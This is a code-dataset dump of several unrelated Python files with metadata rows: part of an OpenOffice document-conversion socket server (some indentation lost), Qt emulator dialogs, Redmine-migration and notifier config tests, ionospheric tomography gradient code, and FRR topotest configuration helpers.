PATH: "PATH=" PATH_TO_DOCUMENT
PATH_TO_DOCUMENT: <file-path>
Response:
.. productionlist::
RESPONSE: OK_RESULT | ERR_RESULT | VERSION_RESULT
OK_RESULT: "OK " STATUS PATH_TO_RESULT
ERR_RESULT: "ERR " STATUS ERR_MSG
STATUS: <integer-number>
PATH_TO_RESULT: <file-path>
ERR_MSG: <textblock>
VERSION_RESULT: "OK 0 " <server-version>
with:
``<NL>``
NewLine character
``<file-path>``
a valid path to a local file
``<integer-number>``
an integer number
``<server-version>``
a string like ``0.1dev``
``<text>``
a string, possibly containing several lines.
Examples:
Request::
CONVERT_PDF
PATH=/home/foo/bar.odt
Response::
OK 0 /tmp/asdqwe.pdf
Request::
CONVERT_HTML
PATH=/home/foo/bar.docx
Response::
OK 0 /tmp/sdfwqer
Request::
FIND
PATH=/home/foo/bar.docx
REGEX=regex
Response::
OK 0 [{'page':1},{'page':33}]
Request::
TEST
Response::
ERR -1 Could not reach OpenOffice.org server on port 2002
Please make sure to start oooctl.
"""
logger = self.server.logger
logger.debug('received conversion request')
data = self.rfile.readline().strip()
if "TEST" == data:
info = pkg_resources.get_distribution('ulif.openoffice')
self.wfile.write('OK 0 %s\n' % info.version)
return
if data not in ["CONVERT_PDF", "CONVERT_HTML", "FIND"]:
self.wfile.write('ERR 550 unknown command. Use CONVERT_HTML, '
'CONVERT_PDF, FIND or TEST.\n')
            logger.debug('received unknown command. Finishing request.')
return
logger.debug('command: %s' % data)
key, path = self.getKeyValue(self.rfile.readline())
if key is None or key != "PATH":
self.wfile.write('ERR 550 missing path.')
logger.info('no path given. transaction cancelled.')
return
logger.debug('path: %s' % path)
if data == 'FIND':
key, regex = self.getKeyValue(self.rfile.readline())
if key is None or key != "REGEX":
self.wfile.write('ERR 550 missing regex.')
logger.info('no regex given. transaction cancelled.')
return
self.wfile.write('path: %s\n' % path)
extension = ""
path = self.prepareSource(path, extension)
path_dir = os.path.dirname(path)
try:
(ret_val, matches) = find(regex=regex, paths=[path])
except Exception, e:
self.wfile.write('ERR 550 %s: %s\n' % (e.__class__, e.message))
shutil.rmtree(path_dir)
logger.warn('550 ERR search failed %s: %s' %(
e.__class__, e.message))
return
            except:
                self.wfile.write('ERR 550 internal pyuno error \n')
                shutil.rmtree(path_dir)
                logger.warn('550 ERR internal pyuno error')
                return
if ret_val != 0:
self.wfile.write('ERR 550 search not finished: %s' % (
ret_val,))
logger.warn('550 ERR search not finished: %s' % (
ret_val,))
shutil.rmtree(path_dir)
else:
logger.debug('search finished.')
os.unlink(path)
self.wfile.write('OK 200 %s' % matches)
logger.info('200 OK, doc searched: %s' % matches)
return
if data == 'CONVERT_PDF':
self.wfile.write('path: %s\n' % path)
filter_name = "writer_pdf_Export"
extension = "pdf"
if data == 'CONVERT_HTML':
self.wfile.write('path: %s\n' % path)
filter_name = "HTML (StarWriter)"
extension = "html"
# Ask cache before doing conversion...
cm = self.server.cache_manager
if cm:
dest_path = cm.getCachedFile(path, suffix=extension)
if dest_path is not None:
# TODO: Here we might unpack stuff, copy to secure location etc.
dest_path = self.prepareCacheResults(path, dest_path, extension)
self.wfile.write('OK 200 %s' % (dest_path,))
logger.info('200 OK. FOUND in cache. request completed')
logger.debug('result in %s' % dest_path)
return
logger.debug('doc NOT FOUND in cache, start conversion.')
ret_val = -1
dest_path = ''
# Copy source to safe destination...
path = self.prepareSource(path, extension)
path_dir = os.path.dirname(path)
try:
(ret_val, dest_paths) = convert(
filter_name=filter_name, extension=extension, paths=[path])
if len(dest_paths):
dest_path = urlsplit(dest_paths[0])[2]
except Exception, e:
self.wfile.write('ERR 550 %s: %s\n' % (e.__class__, e.message))
shutil.rmtree(path_dir)
logger.warn('550 ERR conversion failed %s: %s' %(
e.__class__, e.message))
return
except:
self.wfile.write('ERR 550 internal pyuno error \n')
logger.warn('550 ERR internal pyuno error')
if ret_val != 0:
self.wfile.write('ERR 550 conversion not finished: %s' % (
ret_val,))
logger.warn('550 ERR conversion not finished: %s' % (
ret_val,))
shutil.rmtree(path_dir)
else:
# Notify cache manager...
logger.debug('conversion finished.')
if cm:
logger.debug('updating cache.')
cache_path = self.prepareCaching(path, dest_path, extension)
cm.registerDoc(source_path=path, to_cache=cache_path,
suffix=extension)
# Remove source and tarfile from result...
if cache_path != dest_path:
os.unlink(cache_path)
os.unlink(path)
self.wfile.write('OK 200 %s' % (dest_path,))
logger.info('200 OK, doc converted: %s' % (dest_path,))
return
def prepareSource(self, src_path, extension):
"""We move the source to a secure location.
This way we prevent results from being polluted by already
existing files not belonging to the result.
"""
new_dir = tempfile.mkdtemp()
basename = os.path.basename(src_path)
safe_src_path = os.path.join(new_dir, basename)
shutil.copy2(src_path, safe_src_path)
return safe_src_path
def prepareCaching(self, src_path, result_path, extension):
"""Before we can feed the cachemanager, we tar HTML results.
"""
if extension == 'html':
basename = os.path.basename(result_path)
dirname = os.path.dirname(result_path)
tarname = basename + '.tar.gz'
result_path = os.path.join(dirname, tarname)
# Temporarily move source out of result dir...
fd, tmpfile = tempfile.mkstemp()
shutil.move(src_path, tmpfile)
# Create tarfile out of result dir...
tfile = tarfile.open(name=result_path, mode="w:gz")
tfile.add(dirname, 'result')
tfile.close()
# Move source back into result dir...
shutil.move(tmpfile, src_path)
return result_path
def prepareCacheResults(self, src_path, result_path, extension):
"""Move results to a secure destination.
If the result is HTML we try to untar the result file.
"""
# copy results to safe location...
new_dir = tempfile.mkdtemp()
result_base = os.path.splitext(os.path.basename(src_path))[0]
safe_result_path = os.path.join(new_dir, '%s.%s' % (
result_base, extension))
# HTML results must be untarred...
if extension == 'html':
tar = tarfile.open(result_path, 'r:gz')
for tarinfo in tar:
tar.extract(tarinfo, new_dir)
tar.close()
# move files from result to upper dir...
resultdir = os.path.join(new_dir, 'result')
for filename in os.listdir(resultdir):
src = os.path.join(resultdir, filename)
dest = os.path.join(new_dir, filename)
if filename.endswith('html'):
# Make sure that blah.doc results in blah.html
# even if it comes from cache and the original doc
# was named foo.doc (generating foo.html)
dest = safe_result_path
shutil.copy2(src, dest)
shutil.rmtree(resultdir)
else:
shutil.copy2(result_path, safe_result_path)
return safe_result_path
def getKeyValue(self, line):
if "=" not in line:
return (None, None)
key, value = line.split('=', 1)
return (key.strip(), value.strip())
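# Minimal client sketch for the protocol documented in handle() above.
# Host and port are hypothetical; use whatever run() was started with:
#
#   import socket
#   s = socket.create_connection(('localhost', 8008))
#   s.sendall('CONVERT_PDF\nPATH=/home/foo/bar.odt\n')
#   reply = s.recv(4096)  # contains the status line, e.g. 'OK 200 /tmp/.../bar.pdf'
#   s.close()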
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
"""An asynchronous TCP server.
"""
#: The cache manager instance used by any server isntance.
cache_manager = None
#: A logger instance.
logger = None
#: Marker to check while serving for stop-requests.
do_stop = False
def server_bind(self):
"""Bind server to socket.
We use ``SO_REUSEADDR`` to ensure, that we can reuse the
port on restarts immediately. Otherwise we would be blocked
by ``TIME_WAIT`` for several seconds or minutes.
"""
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return SocketServer.TCPServer.server_bind(self)
def serve_forever(self):
while not self.do_stop:
self.handle_request()
self.logger.info('stopped accepting requests')
def shutdown(self):
self.logger.info('shutting down server.')
self.do_stop = True
def run(host, port, python_binary, uno_lib_dir, cache_dir, logger):
"""Start an instance of :class:`ThreadedTCPServer`.
"""
server = ThreadedTCPServer((host, port), ThreadedTCPRequestHandler)
ip, port = server.server_address
if cache_dir:
server.cache_manager = CacheManager(cache_dir)
server.logger = logger
def signal_handler(signal, frame):
print "Received SIGINT."
print "Stopping PyUNO server."
server.shutdown()
server.logger.info('exiting')
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
# This will run until shutdown without consuming CPU cycles all
# the time...
server.serve_forever()
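# Hypothetical startup of the server (all arguments are example values):
#
#   import logging
#   run('localhost', 8008, '/usr/bin/python', '/usr/lib/openoffice/program',
#       '/var/cache/oooconv', logging.getLogger('pyunoserver'))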
| gpl-2.0 | -3,064,599,806,069,286,000 | 33.752 | 80 | 0.561924 | false |
mupen64plus/mupen64plus-ui-python | src/m64py/frontend/dialogs.py | 1 | 2520 | # -*- coding: utf-8 -*-
# Author: Milan Nikolic <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QDialog, QMessageBox, QListWidgetItem
from m64py.utils import version_split
from m64py.core.defs import FRONTEND_VERSION
try:
from m64py.ui.about_ui import Ui_AboutDialog
from m64py.ui.license_ui import Ui_LicenseDialog
from m64py.ui.archive_ui import Ui_ArchiveDialog
except ModuleNotFoundError:
sys.stderr.write("You have to run setup.py build first\n")
sys.exit(1)
class AboutDialog(QDialog, Ui_AboutDialog):
def __init__(self, parent):
QDialog.__init__(self, parent)
self.setupUi(self)
if parent.worker.core.core_version != "Unknown":
version = version_split(parent.worker.core.core_version)
else:
version = "Unknown"
text = self.labelAbout.text()
text = text.replace("FRONTEND_VERSION", FRONTEND_VERSION)
text = text.replace("CORE_VERSION", version)
self.labelAbout.setText(text)
self.show()
class LicenseDialog(QDialog, Ui_LicenseDialog):
def __init__(self, parent):
QDialog.__init__(self, parent)
self.setupUi(self)
self.show()
class InfoDialog(QMessageBox):
def __init__(self, parent=None, text=None):
QMessageBox.__init__(self, parent)
self.setText(text)
self.setWindowTitle("Info")
self.show()
class ArchiveDialog(QDialog, Ui_ArchiveDialog):
def __init__(self, parent, files):
QDialog.__init__(self, parent)
self.setupUi(self)
self.build_list(files)
def build_list(self, files):
self.listWidget.clear()
for fname in files:
item = QListWidgetItem(fname)
item.setData(Qt.UserRole, fname)
self.listWidget.addItem(item)
self.listWidget.setCurrentRow(0)
| gpl-3.0 | -3,016,938,212,530,211,000 | 32.6 | 71 | 0.678968 | false |
invenfantasy/software-factory | tools/sfmigration/sfmigration/tests/issues/test_redmine.py | 1 | 3063 | #!/usr/bin/env python
#
# Copyright (C) 2015 eNovance SAS <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sfmigration.issues import redmine
from sfmigration.tests.issues import common
test_version = {'id': 1,
'name': '0.1.0',
'status': 'closed'}
test_issue = {'id': 1,
'subject': 'test feature',
'description': 'the best feature in the universe',
'tracker': {'id': 2,
'name': 'User story'},
'status': {'id': 3,
'name': 'In Progress'},
'priority': {'id': 4,
'name': 'Urgent'},
'done_ratio': 50,
'story_points': 13,
'fixed_version': test_version, }
class TestRedmineImporter(common.BaseTestImporter):
@classmethod
def setupClass(cls):
cls.importer = redmine.RedmineImporter(username='wendy',
password='testaburger',
id=1,
url='http://fake/redmine',
name='glitter and sparkles')
cls.expected_issue = {
'source_id': test_issue['id'],
'subject': test_issue['subject'],
'description': test_issue['description'],
'tracker_id': test_issue['tracker']['id'],
'tracker_name': test_issue['tracker']['name'],
'status_id': test_issue['status']['id'],
'status_name': test_issue['status']['name'],
'priority_id': test_issue['priority']['id'],
'priority_name': test_issue['priority']['name'],
'done_ratio': test_issue['done_ratio'],
'story_points': test_issue['story_points'],
'fixed_version_id': test_issue['fixed_version']['id'],
'version_name': test_issue['fixed_version']['name'], }
cls.expected_version = {
'source_id': test_version['id'],
'name': test_version['name'],
'status': test_version['status'], }
cls.test_version = test_version
cls.test_issue = test_issue
cls.fetch_versions_call_to_patch = ('redmine.managers'
'.ResourceManager.filter')
cls.fetch_issues_call_to_patch = ('redmine.managers'
'.ResourceManager.filter')
| apache-2.0 | 2,867,644,867,389,157,400 | 40.391892 | 75 | 0.52824 | false |
jimr/noterator | tests/test_config.py | 1 | 1365 | # -*- coding: utf-8 -*-
import unittest
from .utils import all_available_methods, get_config_path
from noterator import Noterator
from noterator.config import ConfigurationError
class TestConfigValidation(unittest.TestCase):
def test_valid_config(self):
noterator = Noterator(
method=all_available_methods(),
config_file=get_config_path('config-full.ini')
)
noterator._validate_config()
def test_invalid_config(self):
noterator = Noterator(
method=all_available_methods(),
config_file=get_config_path('config-bad.ini')
)
with self.assertRaises(ConfigurationError):
noterator._validate_config()
def test_bad_path(self):
noterator = Noterator(
method=all_available_methods(),
config_file='nowhere-useful',
)
self.assertEqual(len(noterator.cfg.sections()), 0)
with self.assertRaises(ConfigurationError):
noterator._validate_config()
def test_config_patch(self):
noterator = Noterator(
method=all_available_methods(),
config_file='nowhere-useful',
)
self.assertEqual(len(noterator.cfg.sections()), 0)
noterator.configure_plugin('desktop', sound='true')
self.assertEqual(len(noterator.cfg.sections()), 1)
| mit | 307,810,941,396,676,740 | 30.022727 | 59 | 0.630037 | false |
Joshuaalbert/IonoTomo | src/ionotomo/inversion/gradient_and_adjoint.py | 1 | 13841 | '''The gradient for steepest direction, i.e. <Cm, d/dm(-log(posterior))>
is equal to Adjoint(G).(g(m) - d_obs) + (m - m_prior) = Cm.G^t.Cd^-1 .( g(m) - d_obs ) + (m - m_prior)'''
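# In symbols (restating the docstring): the gradient evaluated below is
#   grad S(m) = C_m G^T C_d^{-1} (g(m) - d_obs) + (m - m_prior)
# do_adjoint() accumulates the smoothed data-misfit term along the rays and
# the compute_adjoint/compute_gradient* wrappers add the prior term.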
from ionotomo.geometry.tri_cubic import bisection
import numpy as np
from scipy.integrate import simps
import dask.array as da
from dask import delayed
from dask.multiprocessing import get
from ionotomo.ionosphere.covariance import Covariance
def do_adjoint(rays, dd, K_ne, m_tci, sigma_m, Nkernel, size_cell, i0):
#print("Doing gradient")
L_m = Nkernel*size_cell
#if antennas parallelization Nt,Nd
#if directions parallelization Na,Nd
N1,N2,_,Ns = rays.shape
m_shape = [N1,N2,m_tci.nx,m_tci.ny,m_tci.nz]
grad = np.zeros([m_tci.nx,m_tci.ny,m_tci.nz],dtype=np.double)
mask = np.zeros(m_shape, dtype=np.bool)
idx_min = np.ones(m_shape,dtype=np.int64)*Ns
idx_max = np.ones(m_shape,dtype=np.int64)*-1
nevec = np.zeros([N1,N2,Ns],dtype=np.double)
#go through the mask
# X,Y,Z = np.meshgrid(np.arange(m_tci.xvec.size),
# np.arange(m_tci.yvec.size),
# np.arange(m_tci.zvec.size),indexing='ij')
j = 0
while j < N1:
k = 0
while k < N2:
x_ray = rays[j,k,0,:]
y_ray = rays[j,k,1,:]
z_ray = rays[j,k,2,:]
s_ray = rays[j,k,3,:]
nevec[j,k,:] = K_ne*np.exp(m_tci.interp(x_ray,y_ray,z_ray))/1e13
idx = 0
while idx < Ns:
#nevec[j,k,idx] = K_ne*np.exp(m_tci.interp(x_ray[idx],y_ray[idx],z_ray[idx]))/1e13
xi,yi,zi = bisection(m_tci.xvec,x_ray[idx]),bisection(m_tci.yvec,y_ray[idx]),bisection(m_tci.zvec,z_ray[idx])
local_mask = (j,k,slice(max(0,xi - Nkernel), min(m_tci.nx - 1, xi + Nkernel + 1)),
slice(max(0,yi - Nkernel) , min(m_tci.ny - 1,yi + Nkernel + 1)),
slice(max(0, zi - Nkernel), min(m_tci.nz - 1, zi + Nkernel + 1)))
mask[local_mask] = True
shape = mask[local_mask].shape
idx_max[local_mask] = np.max(np.stack([idx_max[local_mask],
np.ones(shape,dtype=np.int64)*idx],axis=-1),axis=-1)
#print(idx_max[local_mask])
idx_min[local_mask] = np.min(np.stack([idx_min[local_mask],
np.ones(shape,dtype=np.int64)*idx],axis=-1),axis=-1)
idx += 1
k += 1
j += 1
sum_mask = np.sum(np.sum(mask,axis=0),axis=0)
xi = 0
while xi < m_tci.nx:
yi = 0
while yi < m_tci.ny:
zi = 0
while zi < m_tci.nz:
if not sum_mask[xi,yi,zi]:
zi += 1
continue
x,y,z = m_tci.xvec[xi],m_tci.yvec[yi],m_tci.zvec[zi]
j = 0
while j < N2:
i = 0
while i < N1:
x_ray = rays[i,j,0,:]
y_ray = rays[i,j,1,:]
z_ray = rays[i,j,2,:]
s_ray = rays[i,j,3,:]
ne = nevec[i,j,:]
if mask[i,j,xi,yi,zi]:
segment_mask = (slice(idx_min[i,j,xi,yi,zi],idx_max[i,j,xi,yi,zi]+1),)
dx = x - x_ray[segment_mask]
dy = y - y_ray[segment_mask]
dz = z - z_ray[segment_mask]
Cm = dx**2
dy *= dy
dz *= dz
Cm += dy
Cm += dz
#np.sqrt(Cm,out=Cm)
Cm /= -2.*L_m**2
np.exp(Cm,out=Cm)
Cm *= sigma_m**2
Cm *= ne[segment_mask]
comp = simps(Cm*dd[i,j],s_ray[segment_mask])
grad[xi,yi,zi] += comp
# if i == i0:
# grad[xi,yi,zi] -= N1*comp
i += 1
j += 1
zi += 1
yi += 1
xi += 1
grad[:,:,:] -= grad[i0,:,:]
return grad
def compute_adjoint_dask(rays, g, dobs, i0, K_ne, m_tci, m_prior, CdCt, sigma_m, Nkernel, size_cell):
L_m = Nkernel*size_cell
# #i not eq i0 mask
# mask = np.ones(rays.shape[0],dtype=np.bool)
# mask[i0] = False
# rays = rays[mask,:,:,:,:]
# g = g[mask,:,:]
# dobs = dobs[mask,:,:]
# CdCt = CdCt[mask,:,:]
#residuals
#g.shape, dobs.shape [Na,Nt,Nd]
dd = g - dobs
#weighted residuals
#Cd.shape [Na,Nt,Nd] i.e. diagonal
#CdCt^-1 = 1./CdCt
dd /= (CdCt + 1e-15)
#get ray info
Na, Nt, Nd, _ ,Ns = rays.shape
#parallelize over directions
gradient = da.sum(da.stack([da.from_delayed(delayed(do_adjoint)(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
sigma_m, Nkernel, size_cell, i0),(m_tci.nx,m_tci.ny,m_tci.nz),dtype=np.double) for d in range(Nd)],axis=-1),axis=-1)
gradient = gradient.compute(get=get)
gradient += m_tci.M
gradient -= m_prior
return gradient
def compute_adjoint(rays, g, dobs, i0, K_ne, m_tci, m_prior, CdCt, sigma_m, Nkernel, size_cell):
L_m = Nkernel*size_cell
# #i not eq i0 mask
# mask = np.ones(rays.shape[0],dtype=np.bool)
# mask[i0] = False
# rays = rays[mask,:,:,:,:]
# g = g[mask,:,:]
# dobs = dobs[mask,:,:]
# CdCt = CdCt[mask,:,:]
#residuals
#g.shape, dobs.shape [Na,Nt,Nd]
dd = g - dobs
#weighted residuals
#Cd.shape [Na,Nt,Nd] i.e. diagonal
#CdCt^-1 = 1./CdCt
dd /= (CdCt + 1e-15)
#get ray info
Na, Nt, Nd, _ ,Ns = rays.shape
# if Na < Nd:
# #parallelize over antennas
# gradient = np.sum(np.stack([do_gradient(rays[i,:,:,:,:], dd[i,:,:], K_ne, m_tci,
# sigma_m, Nkernel, size_cell) for i in range(Na)],axis=-1),axis=-1)
# else:
# #parallelize over directions
# gradient = np.sum(np.stack([do_gradient(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
# sigma_m, Nkernel, size_cell) for d in range(Nd)],axis=-1),axis=-1)
#parallelize over directions
gradient = np.sum(np.stack([do_adjoint(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
sigma_m, Nkernel, size_cell,i0) for d in range(Nd)],axis=-1),axis=-1)
gradient += m_tci.M
gradient -= m_prior
return gradient
def do_gradient(rays, dd, K_ne, m_tci, sigma_m, Nkernel, size_cell, i0):
'''Gradient of S is G^t.CdCt^-1.(g-dobs) + Cm^-1.(m - mprior)'''
    adjoint = do_adjoint(rays, dd, K_ne, m_tci, sigma_m, Nkernel, size_cell, i0)
    return adjoint
# Nkernel=0
# #print("Doing gradient")
# L_m = Nkernel*size_cell
# #if antennas parallelization Nt,Nd
# #if directions parallelization Na,Nd
# N1,N2,_,Ns = rays.shape
# m_shape = [N1,N2,m_tci.nx,m_tci.ny,m_tci.nz]
# grad = np.zeros([m_tci.nx,m_tci.ny,m_tci.nz],dtype=np.double)
#
# mask = np.zeros(m_shape, dtype=np.bool)
# #idx_min = np.ones(m_shape,dtype=np.int64)*Ns
# #idx_max = np.ones(m_shape,dtype=np.int64)*-1
# #nevec = np.zeros([N1,N2,Ns],dtype=np.double)
# #go through the mask
# j = 0
# while j < N1:
# k = 0
# while k < N2:
# x_ray = rays[j,k,0,:]
# y_ray = rays[j,k,1,:]
# z_ray = rays[j,k,2,:]
# s_ray = rays[j,k,3,:]
# idx = 0
# while idx < Ns:
# #nevec[j,k,idx] = K_ne*np.exp(m_tci.interp(x_ray[idx],y_ray[idx],z_ray[idx]))/1e16
# xi,yi,zi = bisection(m_tci.xvec,x_ray[idx]),bisection(m_tci.yvec,y_ray[idx]),bisection(m_tci.zvec,z_ray[idx])
# local_mask = (j,k,slice(max(0,xi - Nkernel), min(m_tci.nx - 1, xi + Nkernel + 1)),
# slice(max(0,yi - Nkernel) , min(m_tci.ny - 1,yi + Nkernel + 1)),
# slice(max(0, zi - Nkernel), min(m_tci.nz - 1, zi + Nkernel + 1)))
# mask[local_mask] = True
# shape = mask[local_mask].shape
## idx_max[local_mask] = np.max(np.stack([idx_max[local_mask],
## np.ones(shape,dtype=np.int64)*idx],axis=-1),axis=-1)
## #print(idx_max[local_mask])
## idx_min[local_mask] = np.min(np.stack([idx_min[local_mask],
## np.ones(shape,dtype=np.int64)*idx],axis=-1),axis=-1)
# idx += 1
# k += 1
# j += 1
#
# #Cm^-1 (m-mprior)
# dmpart = np.zeros([m_tci.nx,m_tci.ny,m_tci.nz],dtype=np.double)
# sum_mask = np.sum(np.sum(mask,axis=0),axis=0)#is there any ray in the cell at all?
# xi = 0
# while xi < m_tci.nx:
# yi = 0
# while yi < m_tci.ny:
# zi = 0
# while zi < m_tci.nz:
# if not sum_mask[xi,yi,zi]:
# zi += 1
# continue
# x,y,z = m_tci.xvec[xi],m_tci.yvec[yi],m_tci.zvec[zi]
# j = 0
# while j < N2:
# i = 0
# while i < N1:
# paircomp = 0.
# if mask[i,j,xi,yi,zi]:
# paircomp = 1.
# if mask[i0,j,xi,yi,zi]:
# paircomp -= 1.
# grad[xi,yi,zi] += dd[i,j]*paircomp*K_ne*np.exp(m_tci.interp(m_tci.xvec[xi],
# m_tci.yvec[yi],
# m_tci.zvec[zi]))/1e12
#
#
# i += 1
# j += 1
# zi += 1
# yi += 1
# xi += 1
# return grad
def compute_gradient_dask(rays, g, dobs, i0, K_ne, m_tci, m_prior, CdCt, sigma_m, Nkernel, size_cell, cov_obj=None):
L_m = Nkernel*size_cell
# #i not eq i0 mask
# mask = np.ones(rays.shape[0],dtype=np.bool)
# mask[i0] = False
# rays = rays[mask,:,:,:,:]
# g = g[mask,:,:]
# dobs = dobs[mask,:,:]
# CdCt = CdCt[mask,:,:]
#residuals
#g.shape, dobs.shape [Na,Nt,Nd]
dd = g - dobs
#weighted residuals
#Cd.shape [Na,Nt,Nd] i.e. diagonal
#CdCt^-1 = 1./CdCt
dd /= (CdCt + 1e-15)
#get ray info
Na, Nt, Nd, _ ,Ns = rays.shape
# if Na < Nd:
# #parallelize over antennas
# gradient = da.sum(da.stack([da.from_delayed(delayed(do_gradient)(rays[i,:,:,:,:], dd[i,:,:], K_ne, m_tci,
# sigma_m, Nkernel, size_cell),(m_tci.nx,m_tci.ny,m_tci.nz),dtype=np.double) for i in range(Na)],axis=-1),axis=-1)
# else:
# #parallelize over directions
# gradient = da.sum(da.stack([da.from_delayed(delayed(do_gradient)(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
# sigma_m, Nkernel, size_cell),(m_tci.nx,m_tci.ny,m_tci.nz),dtype=np.double) for d in range(Nd)],axis=-1),axis=-1)
#parallelize over directions
gradient = da.sum(da.stack([da.from_delayed(delayed(do_gradient)(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
sigma_m, Nkernel, size_cell, i0),(m_tci.nx,m_tci.ny,m_tci.nz),dtype=np.double) for d in range(Nd)],axis=-1),axis=-1)
gradient = gradient.compute(get=get)
if cov_obj is not None:
dm = m_tci.M - m_prior
        gradient += cov_obj.contract(dm)
#gradient += m_tci.M
#gradient -= m_prior
return gradient
def compute_gradient(rays, g, dobs, i0, K_ne, m_tci, m_prior, CdCt, sigma_m, Nkernel, size_cell, cov_obj=None):
L_m = Nkernel*size_cell
# #i not eq i0 mask
# mask = np.ones(rays.shape[0],dtype=np.bool)
# mask[i0] = False
# rays = rays[mask,:,:,:,:]
# g = g[mask,:,:]
# dobs = dobs[mask,:,:]
# CdCt = CdCt[mask,:,:]
#residuals
#g.shape, dobs.shape [Na,Nt,Nd]
dd = g - dobs
#weighted residuals
#Cd.shape [Na,Nt,Nd] i.e. diagonal
#CdCt^-1 = 1./CdCt
dd /= (CdCt + 1e-15)
#get ray info
Na, Nt, Nd, _ ,Ns = rays.shape
# if Na < Nd:
# #parallelize over antennas
# gradient = np.sum(np.stack([do_gradient(rays[i,:,:,:,:], dd[i,:,:], K_ne, m_tci,
# sigma_m, Nkernel, size_cell) for i in range(Na)],axis=-1),axis=-1)
# else:
# #parallelize over directions
# gradient = np.sum(np.stack([do_gradient(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
# sigma_m, Nkernel, size_cell) for d in range(Nd)],axis=-1),axis=-1)
#parallelize over directions
gradient = np.sum(np.stack([do_gradient(rays[:,:,d,:,:], dd[:,:,d], K_ne, m_tci,
sigma_m, Nkernel, size_cell,i0) for d in range(Nd)],axis=-1),axis=-1)
if cov_obj is not None:
dm = m_tci.M - m_prior
        gradient += cov_obj.contract(dm)
#gradient += m_tci.M
#gradient -= m_prior
return gradient
| apache-2.0 | 3,531,586,930,173,808,000 | 40.457055 | 156 | 0.449173 | false |
freerangerouting/frr | tests/topotests/lib/common_config.py | 1 | 120562 | #
# Copyright (c) 2019 by VMware, Inc. ("VMware")
# Used Copyright (c) 2018 by Network Device Education Foundation, Inc.
# ("NetDEF") in this file.
#
# Permission to use, copy, modify, and/or distribute this software
# for any purpose with or without fee is hereby granted, provided
# that the above copyright notice and this permission notice appear
# in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND VMWARE DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL VMWARE BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
#
from collections import OrderedDict
from datetime import datetime
from time import sleep
from copy import deepcopy
from subprocess import call
from subprocess import STDOUT as SUB_STDOUT
from subprocess import PIPE as SUB_PIPE
from subprocess import Popen
from functools import wraps
from re import search as re_search
from tempfile import mkdtemp
import StringIO
import os
import sys
import ConfigParser
import traceback
import socket
import ipaddress
from lib.topolog import logger, logger_config
from lib.topogen import TopoRouter, get_topogen
from lib.topotest import interface_set_status
FRRCFG_FILE = "frr_json.conf"
FRRCFG_BKUP_FILE = "frr_json_initial.conf"
ERROR_LIST = ["Malformed", "Failure", "Unknown", "Incomplete"]
ROUTER_LIST = []
####
CD = os.path.dirname(os.path.realpath(__file__))
PYTESTINI_PATH = os.path.join(CD, "../pytest.ini")
# Creating tmp dir with testsuite name to avoid conflict condition when
# multiple testsuites run together. All temporary files would be created
# in this dir and this dir would be removed once testsuite run is
# completed
LOGDIR = "/tmp/topotests/"
TMPDIR = None
# NOTE: to save execution logs to log file frrtest_log_dir must be configured
# in `pytest.ini`.
config = ConfigParser.ConfigParser()
config.read(PYTESTINI_PATH)
config_section = "topogen"
if config.has_option("topogen", "verbosity"):
loglevel = config.get("topogen", "verbosity")
loglevel = loglevel.upper()
else:
loglevel = "INFO"
if config.has_option("topogen", "frrtest_log_dir"):
frrtest_log_dir = config.get("topogen", "frrtest_log_dir")
time_stamp = datetime.time(datetime.now())
logfile_name = "frr_test_bgp_"
frrtest_log_file = frrtest_log_dir + logfile_name + str(time_stamp)
print("frrtest_log_file..", frrtest_log_file)
logger = logger_config.get_logger(
name="test_execution_logs", log_level=loglevel, target=frrtest_log_file
)
print("Logs will be sent to logfile: {}".format(frrtest_log_file))
if config.has_option("topogen", "show_router_config"):
show_router_config = config.get("topogen", "show_router_config")
else:
show_router_config = False
# env variable for setting what address type to test
ADDRESS_TYPES = os.environ.get("ADDRESS_TYPES")
# Saves sequence id numbers
SEQ_ID = {"prefix_lists": {}, "route_maps": {}}
def get_seq_id(obj_type, router, obj_name):
"""
Generates and saves sequence number in interval of 10
Parameters
----------
* `obj_type`: prefix_lists or route_maps
* `router`: router name
    * `obj_name`: name of the prefix-list or route-map
Returns
--------
Sequence number generated
"""
router_data = SEQ_ID[obj_type].setdefault(router, {})
obj_data = router_data.setdefault(obj_name, {})
seq_id = obj_data.setdefault("seq_id", 0)
seq_id = int(seq_id) + 10
obj_data["seq_id"] = seq_id
return seq_id
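# For illustration, with a fresh SEQ_ID state:
#   get_seq_id("prefix_lists", "r1", "pf_list_1")  # -> 10
#   get_seq_id("prefix_lists", "r1", "pf_list_1")  # -> 20 (steps of 10)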
